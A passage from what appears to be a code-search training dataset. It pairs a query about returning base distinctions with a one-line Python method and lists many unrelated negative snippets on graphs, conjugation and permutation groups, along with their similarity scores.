size_tl_nodes, filename)\n # complicated indexing here. As an example, for the 97 into 10x10 case, we want to send 90 nodes\n # to a rectangle spanned by tl=Point(0, 0) and br=Point(9, 8) and we want to send 7 nodes to a \n # rectangle spanned by tl=Point(0, 9) and br=Point(6, 9)\n ret.update(get_locations(nodes_tl, tl=Point(0, 0), br=Point(br.x, len(nodes) / (br.x + 1) - 1)))\n ret.update(get_locations(nodes_br, tl=Point(0, len(nodes) / (br.x + 1)), br=Point(len(nodes) % (br.x + 1) - 1, len(nodes) / (br.x + 1))))\n return ret\n\n if br.x - tl.x > br.y - tl.y: # if rectangle is wider than tall, split on y axis\n half = tl.x + (br.x - tl.x - 1) / 2\n size_tl_nodes = (half - tl.x + 1) * (br.y - tl.y + 1)\n else: # split on x axis\n half = tl.y + (br.y - tl.y - 1) / 2\n size_tl_nodes = (br.x - tl.x + 1) * (half - tl.y + 1)\n\n nodes_tl, nodes_br = partition(nodes, size_tl_nodes, filename)\n\n if br.x - tl.x > br.y - tl.y: # if rectangle is wider than tall, split on y axis\n ret.update(get_locations(nodes_tl, tl=tl, br=Point(half, br.y)))\n ret.update(get_locations(nodes_br, tl=Point(half + 1,tl.y), br=br))\n else: # split on x axis\n ret.update(get_locations(nodes_tl, tl=tl, br=Point(br.x, half)))\n ret.update(get_locations(nodes_br, tl=Point(tl.x, half + 1), br=br))\n\n return ret",
"def infer_reuse_pattern(fgraph, outputs_to_disown):\r\n rval = set()\r\n for o in outputs_to_disown:\r\n view_tree_set(alias_root(o), rval)\r\n # remove from rval all of the inputs, constants, values.\r\n rval = set(r for r in rval if r.owner is not None)\r\n\r\n return rval",
"def graph_generation(nodes: np.ndarray, edges: np.ndarray):\n result_nodes = []\n result_edges = []\n\n last_index = nodes[-1, 0]\n\n done = False\n # print(nodes)\n for p in range(nodes.shape[0]):\n for q in range(nodes.shape[0]):\n if list(nodes[p, 1:-2]) == (list(nodes[q, 1:-2])) and nodes[p, nodes.shape[1] - 2] < \\\n nodes[q, nodes.shape[1] - 2]:\n tmp_node = np.append(nodes[p, 1:], np.append(nodes[q, nodes.shape[1] - 2],\n np.append(nodes[q, nodes.shape[1] - 1],\n np.append(nodes[p, 0],\n nodes[q, 0]))))\n if not done:\n result_nodes = [tmp_node]\n done = True\n else:\n result_nodes = np.concatenate((result_nodes, [tmp_node]))\n\n result_nodes = result_nodes[np.argsort(\n result_nodes[:, [e for e in range(1, result_nodes.shape[1] - 2) if e % 2 != 0]].sum(axis=1)), :]\n\n result_nodes = np.c_[range(last_index + 1, last_index + 1 + result_nodes.shape[0]), result_nodes]\n # print(result_nodes)\n\n done = False\n for e in range(edges.shape[0]):\n for f in range(edges.shape[0]):\n for p in range(result_nodes.shape[0]):\n for q in range(result_nodes.shape[0]):\n if (edges[e, 0] == result_nodes[p, -2] and edges[e, 1] == result_nodes[q, -2] and edges[\n f, 0] == result_nodes[p, -1] and edges[f, 1] == result_nodes[q, -1]) \\\n or (edges[e, 0] == result_nodes[p, -2] and edges[e, 1] == result_nodes[q, -2] and\n result_nodes[p, -1] == result_nodes[q, -1]) \\\n or (edges[e, 0] == result_nodes[p, -1] and edges[e, 1] == result_nodes[q, -1] and\n result_nodes[p, -2] == result_nodes[q, -2]):\n if not done:\n result_edges = [[result_nodes[p, 0], result_nodes[q, 0]]]\n done = True\n else:\n result_edges = np.concatenate(\n (result_edges, [[result_nodes[p, 0], result_nodes[q, 0]]]), axis=0)\n # print(edges)\n\n # print(result_edges)\n unique_result_edges = list(Counter(str(e) for e in result_edges).keys())\n # print(unique_result_edges)\n final_edges = []\n for k in range(len(unique_result_edges)):\n for j in range(result_edges.shape[0]):\n if str(result_edges[j]) == unique_result_edges[k]:\n if k == 0:\n final_edges = result_edges[j]\n break\n else:\n final_edges = np.concatenate((final_edges, result_edges[j]))\n break\n final_edges = np.reshape(final_edges, (int(final_edges.shape[0] / 2), 2))\n # print(final_edges.shape[0])\n done = False\n edge_to_remove = []\n for j in range(final_edges.shape[0]):\n for k in range(j + 1, final_edges.shape[0]):\n if final_edges[j, 1] == final_edges[k, 0]:\n if not done:\n edge_to_remove = [[final_edges[j, 0], final_edges[k, 1]]]\n done = True\n else:\n edge_to_remove = np.concatenate((edge_to_remove, [[final_edges[j, 0], final_edges[k, 1]]]))\n # print(edge_to_remove)\n\n idx_to_remove = []\n done = False\n for j in range(edge_to_remove.shape[0]):\n for k in range(final_edges.shape[0]):\n if list(edge_to_remove[j]) == list(final_edges[k]):\n if not done:\n idx_to_remove = k\n done = True\n else:\n idx_to_remove = np.append(idx_to_remove, k)\n final_edges = np.delete(final_edges, idx_to_remove, axis=0)\n # print(final_edges)\n result_nodes = np.delete(result_nodes, [-1, -2], 1)\n # print(result_nodes)\n return result_nodes, final_edges",
"def build_drop_fullgraphs(self, do_subgraph=False, graph_lib='pygraphviz'):\n if 'pygraphviz' == graph_lib:\n G = pgv.AGraph(strict=True, directed=True)\n else:\n G = nx.Graph()\n do_subgraph = False\n subgraph_dict = defaultdict(list) # k - node-ip, v - a list of graph nodes\n oid_gnid_dict = dict()\n\n for i, oid in enumerate(self.pg_spec.keys()):\n oid_gnid_dict[oid] = str(i)\n logger.info(\"oid to gid mapping done\")\n\n for dropspec in self.pg_spec.itervalues():\n gid = oid_gnid_dict[dropspec['oid']]\n ip = dropspec['node']\n subgraph_dict[ip].append(gid)\n if (dropspec['type'] == 'app'):\n G.add_node(gid, shape='rect', label='')#, fixedsize=True, hight=.05, width=.05)\n elif (dropspec['type'] == 'plain'): #parallelogram\n G.add_node(gid, shape='circle', label='')#, fixedsize=True, hight=.05, width=.05)\n logger.info(\"Graph nodes added\")\n\n for dropspec in self.pg_spec.itervalues():\n gid = oid_gnid_dict[dropspec['oid']]\n if (dropspec['type'] == 'app'):\n ds_kw = 'outputs' #down stream key word\n elif (dropspec['type'] == 'plain'):\n ds_kw = 'consumers'\n else:\n ds_kw = 'None'\n if (ds_kw in dropspec):\n for doid in dropspec[ds_kw]:\n G.add_edge(gid, oid_gnid_dict[doid])\n logger.info(\"Graph edges added\")\n\n if (do_subgraph):\n for i, subgraph_nodes in enumerate(subgraph_dict.values()):\n # we don't care about the subgraph label or rank\n subgraph = G.add_subgraph(subgraph_nodes, label='%d' % i, name=\"cluster_%d\" % i, rank=\"same\")\n subgraph.graph_attr['rank']='same'\n logger.info(\"Subgraph added\")\n\n return G",
"def graph_issubset(graph1, graph2):\n\n # Validate if all arguments are Graphs\n check_graphbase_instance(graph1, graph2)\n\n return graph1.nodes.issubset(graph2.nodes) and graph1.edges.issubset(graph2.edges)",
"def contained(self):\n seen = set()\n return [l.to_segment for l in self.edges_to_contained \\\n if id(l) not in seen and not seen.add(id(l))]",
"def doffsets(self):\n self._flatten()\n for n in self.seq[1:len(self.seq)-1]:\n yield sorted([ d['idx'] - n['idx'] for d in n['edges'] ])\n return",
"def get_inconsistent_edges(graph: BELGraph) -> Iterable[Tuple[BaseEntity]]:\n for u, v in graph.edges():\n if not pair_is_consistent(graph, u, v):\n yield u, v",
"def _adjacency(areal_units):\n\n ## Compute adjacency list\n ## Units adjacent if they share a border (line)\n adjacency = {a:[] for a in areal_units}\n for a0,a1 in itertools.permutations(areal_units, 2):\n if (areal_units[a0].intersection(areal_units[a1])).geom_type == 'LineString': \n adjacency[a0].append(a1)\n adjacency[a1].append(a0)\n\n return adjacency",
"def edges(self) -> Set[Tuple[int, int]] : \n edges : Set[Tuple[int, int]] = set()\n for node_id in self.nodes: # iterator over id's\n for adj_node in self.nodes[node_id]:\n edge = (node_id, adj_node)\n if self.directed:\n edges.add(edge)\n else:\n if edge[::-1] not in edges: # if reverse edge not in edges...\n edges.add(edge)\n return edges",
"def dominance_frontiers(G, start):\n idom = nx.immediate_dominators(G, start)\n\n df = {u: set() for u in idom}\n for u in idom:\n if len(G.pred[u]) >= 2:\n for v in G.pred[u]:\n if v in idom:\n while v != idom[u]:\n df[v].add(u)\n v = idom[v]\n return df",
"def compare(self):\n len0 = len(self.cluster_lists[0])\n len1 = len(self.cluster_lists[1])\n longer_index = 0 if len0 >= len1 else 1\n shorter_index = 1 if len1 <= len0 else 0\n self.stars_length = len(self.cluster_lists[shorter_index]) \n self.starlets_length = len(self.cluster_lists[longer_index]) \n # build the noeds for shorter cluster list, and get the\n # distribution of cluster size.\n for cluster in self.cluster_lists[shorter_index]:\n len_spectra = len(cluster.get_spectra())\n star = ClusterNode(cluster.id, len_spectra) \n self.stars[cluster.id] = star\n\n self.cluster_spectra_num[shorter_index] += len_spectra\n self.cluster_size_dist[shorter_index][len_spectra] = self.cluster_size_dist[shorter_index].get(len_spectra,0) + 1\n # build the noeds for longer cluster list, and get the\n # distribution of cluster size.\n for cluster in self.cluster_lists[longer_index]:\n len_spectra = len(cluster.get_spectra())\n starlet = ClusterNode(cluster.id, len_spectra) \n self.starlets[cluster.id] = starlet\n\n self.cluster_spectra_num[longer_index] += len_spectra\n self.cluster_size_dist[longer_index][len_spectra] = self.cluster_size_dist[longer_index].get(len_spectra,0) + 1\n # do the comparing, and network building\n for i in range (0, len(self.cluster_lists[shorter_index])):\n cluster0 = self.cluster_lists[shorter_index][i] \n for j in range (i, len(self.cluster_lists[longer_index])):\n cluster1 = self.cluster_lists[longer_index][j] \n (shared_spec_num, similarity) = self.calculate_similarity(cluster0, cluster1)\n if similarity == 0:\n continue\n self.similarity_dist[int(similarity*10)] = self.similarity_dist.get(int(similarity*10),0) + 1\n self.shared_spec_num += shared_spec_num\n\n self.stars[cluster0.id].add_nb_node(cluster1.id, similarity, shared_spec_num)\n self.starlets[cluster1.id].add_nb_node(cluster0.id, similarity, shared_spec_num)\n\n self.ave_star_size = self.cluster_spectra_num[shorter_index]/self.stars_length\n self.ave_starlet_size = self.cluster_spectra_num[longer_index]/self.starlets_length",
"def _get_full_graph(self):",
"def get_dominant_graph(msm, with_comm_classes=False):\n\n g = AGraph(strict=False, directed=True)\n\n g.graph_attr.update(size=\"7.75, 10.25\")\n g.graph_attr.update(dpi=\"300\")\n for i in range(msm.num_nodes):\n if(i in msm.a):\n g.add_node(i, color = 'blue')\n elif(i in msm.b):\n g.add_node(i, color = 'green')\n elif(i in msm.dominant_pathway):\n g.add_node(i, color= 'red')\n else:\n g.add_node(i)\n\n if with_comm_classes:\n comm_classes = msm.communication_classes\n\n for (i, comm) in enumerate(comm_classes):\n g.add_subgraph(nbunch=comm, name='cluster%d' % i,\n style='rounded, dotted',\n color='lightgrey',\n label='<<B>Communication class %d</B>>' % (i + 1))\n\n for from_node in range(msm.num_nodes):\n for to_node in get_adjacent_nodes(msm, from_node, discard_self=False):\n if msm.effective_probability_current[from_node, to_node] != 0.0:\n label = '%.2E' % msm.effective_probability_current[from_node, to_node]\n if([from_node, to_node] in msm.dominant_pathway_format):\n g.add_edge(from_node, to_node, color='red' , label=label)\n else:\n \tg.add_edge(from_node, to_node, label=label)\n\n return g",
"def make_set(g, nodes):\n s = Set()\n names = nodes['names']\n for ii,name in enumerate(names):\n \"\"\" \n We will assume node is entirely contained\n in group if they have one atom in common\n \"\"\" \n atoms = mdn.dic2list(nodes[name]['atoms'])\n atom0 = atoms[0]\n if (atom0 in mdn.dic2list(g['atoms'])):\n s.add(ii)\n return s",
"def split_network(self):\n disconnect_nodes(self.nodes[1], 2)\n disconnect_nodes(self.nodes[2], 1)\n self.sync_all([self.nodes[:2], self.nodes[2:]])",
"def __init__(self):\n # set of lists of nodal differences\n self.di = {}\n # self of upper boudns\n self.i = {}",
"def filter_graph(self, sorted_node, ploidy):\n \n for node in sorted_node:\n \n # while number of prefix edge > ploidy level\n while len(self.prefix[node]) > ploidy:\n min_weight_node = min(self.prefix[node], key=self.prefix[node].get)\n self.remove_edge(min_weight_node, node)\n \n # while number of suffix edge > ploidy level\n while len(self.suffix[node]) > ploidy:\n min_weight_node = min(self.suffix[node], key=self.suffix[node].get)\n self.remove_edge(node, min_weight_node)\n \n print(\"Graph is reduced to best overlap graph.\")",
"def make_complete_graph(num_nodes):\r\n result = {}\r\n for idx in range(0,num_nodes):\r\n result[idx] = set([])\r\n for jdx in range(0,num_nodes):\r\n if (idx!=jdx):\r\n result[idx].add(jdx)\r\n return result",
"def createBridgeSets(blocksize,operating,MPSS):\n sets = tuple()\n xul = blocksize[0]-operating\n xdl = operating\n yul = int(blocksize[0]/2+operating)\n ydl = int(blocksize[0]/2-operating)\n xts = xul\n xbs = xdl\n for i in range(MPSS):\n sets+=(tuple(product(numpy.arange(xdl,xul,1),numpy.arange(ydl,yul,1))),)\n xdl+=operating\n xul-=operating\n ydl-=operating\n yul+=operating\n return sets,sets[::-1]",
"def buildConnectedSets(self, cars):",
"def split_at_nodes(shp):\n nodes = find_nodes(shp)\n nodeIds = list(nodes)\n nodeIds.sort()\n nodeIds = dict([(node,i) for i,node in enumerate(nodeIds)])\n \n for road in shp:\n vrts = road.vertices\n midVrts = set(road.vertices[1:-1]) #we know end points are nodes\n midNodes = midVrts.intersection(nodes) # find any nodes in the middle of the feature.\n midIdx = [vrts.index(node) for node in midNodes] # Get their indices\n midIdx.sort()\n if midIdx:\n #print vrts\n starts = [0]+midIdx\n stops = [x+1 for x in midIdx]+[None]\n for start,stop in zip(starts,stops):\n feat = pysal.cg.Chain(vrts[start:stop])\n rec = (nodeIds[feat.vertices[0]],nodeIds[feat.vertices[-1]],False)\n yield feat,rec\n else:\n rec = (nodeIds[road.vertices[0]],nodeIds[road.vertices[-1]],False)\n yield road,rec",
"def graph_issuperset(graph1, graph2):\n\n # Validate if all arguments are Graphs\n check_graphbase_instance(graph1, graph2)\n\n return graph1.nodes.issuperset(graph2.nodes) and graph1.edges.issuperset(graph2.edges)",
"def find_boundary(edges):\n\n inputs = set([x[0] for x in edges])\n outputs = set([x[1] for x in edges])\n for e in edges:\n inputs.discard(e[1])\n outputs.discard(e[0])\n return inputs, outputs",
"def direct_comparability_graph_to_hase_diagram(direct_comparability):\n\n hase_diagram = DirectedGraph.from_graph(direct_comparability)\n\n hase_diagram.difference(((x, x) for x in direct_comparability))\n\n for x, y in direct_comparability.edges:\n if direct_comparability(x).intersection(direct_comparability(y, begin=False, end=True)):\n hase_diagram.difference([(x, y)])\n continue\n return hase_diagram",
"def sage_graph(self):\n self.fe.load_cache()\n edges = []\n is_bipartite = self.variant.is_bipartite()\n for X in self.L:\n for Y in self.L:\n a = self.op_norm(X, Y)\n if not self.K.is_zero(a):\n for c in self.K.unit_group:\n d = a - c\n if X != Y or c < d or is_bipartite:\n edges.append(((X, c, False), (Y, d, is_bipartite)))\n if X == Y and not is_bipartite:\n break\n return sage.all.Graph(edges)",
"def get_all_pairs(G):\n # list all (start,dest) pairs between which the route must be computed\n pairs_list = [(start, dest) for dest in G.nodes for start in G.nodes]\n\n # shuffle all elements in-place\n random.shuffle(pairs_list)\n\n # generate a set from the list\n pairs_set = set(pairs_list)\n\n return pairs_list, pairs_set"
] | [
"0.6665472",
"0.6266713",
"0.60041565",
"0.5954314",
"0.5943517",
"0.57617503",
"0.56672305",
"0.55829006",
"0.55741566",
"0.5567686",
"0.555246",
"0.5516986",
"0.5512369",
"0.5498665",
"0.54714924",
"0.54479235",
"0.5445841",
"0.54253536",
"0.5403769",
"0.53954047",
"0.5389636",
"0.53824466",
"0.537892",
"0.5357041",
"0.5347916",
"0.5346679",
"0.53353524",
"0.5330936",
"0.5330201",
"0.53229165",
"0.53066695",
"0.5289265",
"0.5280843",
"0.52656573",
"0.5262725",
"0.5259474",
"0.5249874",
"0.5248919",
"0.5243522",
"0.52245885",
"0.52162945",
"0.5209969",
"0.52040476",
"0.52031755",
"0.51924694",
"0.51857835",
"0.51770854",
"0.5174891",
"0.5174891",
"0.5174612",
"0.5171182",
"0.51706445",
"0.5169918",
"0.516673",
"0.51646596",
"0.51619774",
"0.51612425",
"0.5159246",
"0.5140481",
"0.5132481",
"0.51279855",
"0.51265496",
"0.5125759",
"0.51149136",
"0.5114361",
"0.5114361",
"0.5114361",
"0.5114361",
"0.5114361",
"0.51062745",
"0.5101469",
"0.50815475",
"0.5070339",
"0.50637287",
"0.5061575",
"0.5058457",
"0.50573945",
"0.5057391",
"0.505438",
"0.50537384",
"0.5052835",
"0.50504315",
"0.5037462",
"0.5036322",
"0.50269985",
"0.5025969",
"0.5021922",
"0.50207824",
"0.50177324",
"0.50115174",
"0.50073946",
"0.50037575",
"0.4994415",
"0.49932852",
"0.49910322",
"0.49891576",
"0.49890512",
"0.49853975",
"0.49843714",
"0.49834153"
] | 0.58428085 | 5 |
For conjugate distinctions this should be overridden and return the base distinctions used. For none conjugate it will automatically return an empty list. | def getBaseDistinctions(self):
return [] | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_conjugate_bases_of(chebi_ent):\n if hasattr(chebi_ent, 'OntologyParents'):\n return [ent.chebiId for ent in chebi_ent.OntologyParents if\n (ent.type == \"is conjugate base of\")]\n else:\n return []",
"def conjugate(self):\n pass",
"def conjugate(self, ???):",
"def conjugate(self):\n v = zeros_como(self)\n for x in range(self.n):\n v[x] = (self[x]).conjugate()\n\n return v",
"def conjugate(self):\r\n return self.__class__(self._real, -self._imag)",
"def conjugate(self):\n return self.rotate().dagger()",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def conjugate(self, *args, **kwargs): # real signature unknown\n pass",
"def base(self):\n if self._base == []:\n self.schreier_sims()\n return self._base",
"def conjugate(self) -> JaggedArray:\n return self._unitary_op(np.conjugate)",
"def conjugate_irregular_tenses(self):\n conjugations = [ None ] * len(Tense)\n def __look_for_overrides(verb): \n overrides = [ override_attribute.key for override_attribute in ConjugationOverrideProperty.all_except(ConjugationOverrideProperty.conjugation_joins) if hasattr(verb, override_attribute.key)]\n if len(overrides) == 0:\n return None\n \n for attr_name in overrides:\n for tense in range(len(Tense)):\n override = getattr(verb, attr_name)\n if override[tense] is None:\n continue\n \n if tense in Tense.Person_Agnostic():\n if conjugations[tense] is None:\n conjugations[tense] = self.verb_for_derived.conjugate_tense(tense)\n else:\n for person in range(len(Person)):\n if override[tense][person] is not None:\n if conjugations[tense] is None:\n conjugations[tense] = [ None ] * len(Person)\n if conjugations[tense][person] is None:\n conjugations[tense][person] = self.verb_for_derived.conjugate(tense, person)\n __look_for_overrides(self)\n if self.base_verb is not None:\n __look_for_overrides(self.base_verb)\n return conjugations",
"def conjugate(self, x):\n\n a = self.array_form\n b = x.array_form\n n = len(a)\n if len(b) != n:\n raise ValueError(\"The number of elements in the permutations \\\ndon\\'t match.\")\n invb = [None]*n\n for i in xrange(n):\n invb[b[i]] = i\n return _new_from_array_form([invb[a[i]] for i in b])",
"def get_base_coefs(mv):\n\trs = []\n\tfor bs in bases:\n\t\tt = []\n\t\tfor b in bs:\n\t\t\tt.append(mv.coef(b))\n\t\t\t\t\t\n\t\trs.append(t)\t\t\n\treturn rs",
"def conjugate(self):\n return self.__class__(scalar=self.scalar, vector= -self.vector)",
"def conjugate(self) -> 'MultiVector':\n\n return (~self).gradeInvol()",
"def conjugate(self):\n return Complex(self._reNum, -self._imNum)",
"def conjugate(self):\n parts = list(self)\n # Destroy the diagram column by column, adding each column\n # to the new partition\n eat_diagram = [\n [x - k for x in parts if x - k > 0] for k in range(parts[0])]\n conj_part = [len(y) for y in eat_diagram]\n B = BosonicPartitions()\n return B(conj_part)",
"def get_conjugated_nodes(self):\n sets = []\n self.get_backbone()\n m = self.mbb\n for bi in m.GetBonds():\n #print ' -- idx = ', bi.GetIdx()\n n = len(sets)\n iconj = bi.GetIsConjugated()\n ins = ( bt2bo[ bi.GetBondType() ] > 1 ) # is non-single bond?\n if iconj or ins:\n ia1, ia2 = bi.GetBeginAtomIdx(), bi.GetEndAtomIdx()\n set_i = set([ia1, ia2])\n if n == 0:\n sets.append( set_i )\n else:\n for j, set_j in enumerate(sets):\n if set_i.intersection( set_j ) > set([]):\n sets[j].update( set_i )\n else:\n if set_i not in sets: sets.append( set_i )\n #print '-- sets = ', sets\n sets_u = cim.merge_sets(sets)\n return sets_u",
"def concentration(self):\n return [node.concentration for node in self]",
"def omega(self):\n return [coset for coset in range(len(self.p)) if self.p[coset] == coset]",
"def conjugate(self) -> np.ndarray:\n if self.scalar_vector:\n return self.array*np.array([1.0, -1.0, -1.0, -1.0])\n return self.array*np.array([-1.0, -1.0, -1.0, 1.0])",
"def proximal(self):\n if self.exponent == np.inf:\n return proximal_cconj_l1(space=self.domain)\n elif self.exponent == 2:\n return proximal_cconj_l2(space=self.domain)\n else:\n raise NotImplementedError('`gradient` only implemented for p=2 or '\n 'p=inf')",
"def get_bases():\n\tbss = []\n\tfor es in MV.index:\n\t\tbs = []\n\t\tif es == ():\n\t\t\tbs.append(_1)\n\t\telse:\n\t\t\tfor js in es:\n\t\t\t\tbmv = reduce(operator.mul, map(lambda j: e[j], js))\n\t\t\t\tbs.append(bmv)\n\t\t\t\t\n\t\tbss.append(bs)\n\t\n\treturn bss",
"def proximal(self):\n return proximal_cconj_kl(space=self.domain, g=self.prior)",
"def covariates(self):\n return None",
"def coupons(self):\r\n return Coupons(self)",
"def proximal(self):\n return proximal_cconj(proximal_cconj_kl(space=self.domain,\n g=self.prior))",
"def conj(self):\n return np.conj(self)",
"def super_categories(self):\n R = self.base().base_ring()\n category = GradedHopfAlgebrasWithBasis(R)\n return [Realizations(self.base()), category.Quotients()]",
"def conj(self):\n res = self._defer_unary_elementwise(np.conj)\n res.dirs = list(map(opr.neg, res.dirs))\n res.charge = -res.charge\n if self.qodulus is not None:\n res.charge %= res.qodulus\n return res",
"def cyclic_conjugates(self):\n return {self.cyclic_subword(i, i+len(self)) for i in range(len(self))}",
"def pgcd_numerateurs(self):\n\t\tl = []\n\t\tif self.__valide:\n\t\t\tfor m in self.liste_decroissante():\n\t\t\t\te = abs(m.get_coefficient().get_num().valeur())\n\t\t\t\tif not (e in l):\n\t\t\t\t\tl.append(e)\n\t\treturn pgcd_liste(l)",
"def conjugacy_classes(self):\n identity = _af_new(list(range(self.degree)))\n known_elements = {identity}\n classes = [known_elements.copy()]\n\n for x in self.generate():\n if x not in known_elements:\n new_class = self.conjugacy_class(x)\n classes.append(new_class)\n known_elements.update(new_class)\n\n return classes",
"def get_conjugate_acids_of(chebi_ent):\n if hasattr(chebi_ent, 'OntologyParents'):\n return [ent.chebiId for ent in chebi_ent.OntologyParents if\n (ent.type == \"is conjugate acid of\")]\n else:\n return []",
"def conjugate(A):\n if A.is_complex():\n return A.conj()\n return A",
"def proximal(self):\n if self.pointwise_norm.exponent == np.inf:\n return proximal_cconj_l1(space=self.domain)\n elif self.pointwise_norm.exponent == 2:\n return proximal_cconj_l1(space=self.domain, isotropic=True)\n else:\n raise NotImplementedError('`proximal` only implemented for p = 1 '\n 'or 2')",
"def get_conjugate_constructions(self, zero_index=False):\n object_labels, directed_graph = self.get_dependency_graph(zero_index)\n\n sorts = nx.algorithms.dag.all_topological_sorts(directed_graph)\n sorts_list = list(sorts)\n return object_labels, sorts_list",
"def conjugate(x):\n if len(list(x.size())) == 2:\n z = torch.zeros(2, x.size()[1], dtype=torch.double, device=x.device)\n z[0] = x[0]\n z[1] = -x[1]\n\n if len(list(x.size())) == 3:\n z = torch.zeros(\n 2, x.size()[2], x.size()[1], dtype=torch.double, device=x.device\n )\n z[0] = torch.transpose(x[0], 0, 1)\n z[1] = -torch.transpose(x[1], 0, 1)\n\n return z",
"def convex_conj(self):\n convex_conjs = [func.convex_conj for func in self.functionals]\n return SeparableSum(*convex_conjs)",
"def _init_multiplicities(self):\n k = [Integer(1)]\n try:\n for i in range(1, self._.d + 1):\n k.append(integralize(k[-1]*self._.b[i-1]/self._.c[i]))\n self._check_multiplicity(k, i)\n except TypeError:\n raise InfeasibleError(\"%s not integral\" % self.SIZES)\n self._.n = sum(k)\n return k",
"def is_conjugated(self):\n\n return np.array([bond.is_conjugated for bond in self])",
"def abelian_invariants(self):\n if self.is_trivial:\n return []\n gns = self.generators\n inv = []\n G = self\n H = G.derived_subgroup()\n Hgens = H.generators\n for p in primefactors(G.order()):\n ranks = []\n while True:\n pows = []\n for g in gns:\n elm = g**p\n if not H.contains(elm):\n pows.append(elm)\n K = PermutationGroup(Hgens + pows) if pows else H\n r = G.order()//K.order()\n G = K\n gns = pows\n if r == 1:\n break\n ranks.append(multiplicity(p, r))\n\n if ranks:\n pows = [1]*ranks[0]\n for i in ranks:\n for j in range(i):\n pows[j] = pows[j]*p\n inv.extend(pows)\n inv.sort()\n return inv",
"def _coset_representative(self, g, H):\n if H.order() == 1:\n return g\n # The base of self must be an extension of H.base.\n if not(self.base[:len(H.base)] == H.base):\n self._schreier_sims(base=H.base)\n orbits = H.basic_orbits[:]\n h_transversals = [list(_.values()) for _ in H.basic_transversals]\n transversals = [list(_.values()) for _ in self.basic_transversals]\n base = self.base\n base_ordering = _base_ordering(base, self.degree)\n def step(l, x):\n gamma = sorted(orbits[l], key = lambda y: base_ordering[y^x])[0]\n i = [base[l]^h for h in h_transversals[l]].index(gamma)\n x = h_transversals[l][i]*x\n if l < len(orbits)-1:\n for u in transversals[l]:\n if base[l]^u == base[l]^x:\n break\n x = step(l+1, x*u**-1)*u\n return x\n return step(0, g)",
"def _numeric_jacobian(self):\n if self.__numeric_jacobian is None:\n self.__numeric_jacobian = self._lambdify(self._symbolic_jacobian)\n return self.__numeric_jacobian",
"def convex_conj(self):\n return KullbackLeiblerConvexConj(self.domain, self.prior)",
"def get_bases():\n\treturn ((MV.ONE,),) + MV.blades[1:]\n\t# return ((MV.ONE,),) + MV.bases[1:]",
"def get_com(self):\n return self.E, self.L, self.Q",
"def circuits(self) -> List[QuantumCircuit]:\n circ0 = QuantumCircuit(1, 1)\n circ0.measure(0, 0)\n\n circ1 = QuantumCircuit(1, 1)\n circ1.x(0)\n circ1.measure(0, 0)\n\n for i, circ in enumerate([circ0, circ1]):\n circ.metadata = {\n \"experiment_type\": self._type,\n \"qubit\": self.physical_qubits[0],\n \"xval\": i,\n }\n\n return [circ0, circ1]",
"def __init__(self):\n GinacFunction.__init__(self, \"conjugate\",\n conversions=dict(sympy='conjugate'))",
"def convex_conj(self):\n return (1.0 / 4) * L2NormSquared(self.domain)",
"def convex_conj(self):\n return KullbackLeibler(self.domain, self.prior)",
"def get_numerical_derived_accelerations(self):\n # calculate numerical 2° order derivative and return it\n return np.gradient(np.gradient(self.trajectory,axis=1),axis=1)",
"def convex_conj(self):\n return KullbackLeiblerCrossEntropyConvexConj(self.domain, self.prior)",
"def convex_conj(self):\n return IndicatorZero(self.domain, -self.constant)",
"def proximal(self):\n return proximal_cconj(proximal_cconj_kl_cross_entropy(\n space=self.domain, g=self.prior))",
"def get_decomp_list(self, dtype='all'):\n bonded_list = ['bond', 'angle', 'torsion', 'improper']\n bonded14_list = ['coulomb14', 'vdw14']\n nonbonded_list = ['coulomb', 'vdw']\n\n if dtype == 'bonded': return bonded_list\n elif dtype == 'bonded14': return bonded14_list\n elif dtype == 'bonded+': return bonded_list + bonded14_list\n elif dtype == 'nonbonded': return nonbonded_list\n elif dtype == 'nonbonded+': return nonbonded_list + bonded14_list\n else: return bonded_list + bonded14_list + nonbonded_list",
"def convs(self, quantized_only: bool = False) -> List[Conv]:\n\n return list(cast(List['Conv'], self.__op_type_list['Conv'])) \\\n if not quantized_only else [x for x in cast(List['Conv'], self.__op_type_list['Conv'])\n if cast(Conv, x).is_quantized]",
"def GetCommonComponents(self):\n nr = 0\n comp = []\n for i in range(len(self.nodes)):\n comp.append(-1)\n for n in self.nodes:\n if comp[n.index-1] == -1:\n nr += 1\n comp[n.index-1] = nr\n self.Components_R(nr, n, comp)\n return self.GenerateCommonComponents(comp)",
"def connected_components(self) -> List[list]:\n for n in self.dw_graph.get_all_v().values():\n n.distance=0.0\n mega_list = []\n for n in self.dw_graph.get_all_v().values():\n if n.distance!=-10:\n mega_list.append(self.connected_component(n.node_id))\n return mega_list",
"def convex_conj(self):\n return IndicatorNuclearNormUnitBall(\n self.domain,\n conj_exponent(self.outernorm.exponent),\n conj_exponent(self.pwisenorm.exponent))",
"def connected_components(self):\n if self._connected:\n return [self]\n G = Graph()\n G.add_vertices(list(range(self.degree())))\n for p in self._g:\n G.add_edges(enumerate(p.domain()))\n m = G.connected_components()\n if len(m) == 1:\n return [self]\n for mm in m:\n mm.sort()\n m.sort()\n g = [[] for _ in range(len(m))]\n m_inv = [None] * self.degree()\n for t, mt in enumerate(m):\n for i, mti in enumerate(mt):\n m_inv[mti] = i\n for k in range(self.length()):\n tmp = [None] * len(mt)\n for i, mti in enumerate(mt):\n tmp[i] = m_inv[self._g[k](mti)]\n g[t].append(tmp)\n return [Constellation(g=g[i], check=False) for i in range(len(m))]",
"def get(self) -> list:\n return self.__cogs",
"def connected_components(self) -> List[list]:\n self.__set_all_nodes_unvisited()\n res = self.__tarjan()\n # res.reverse()\n return res",
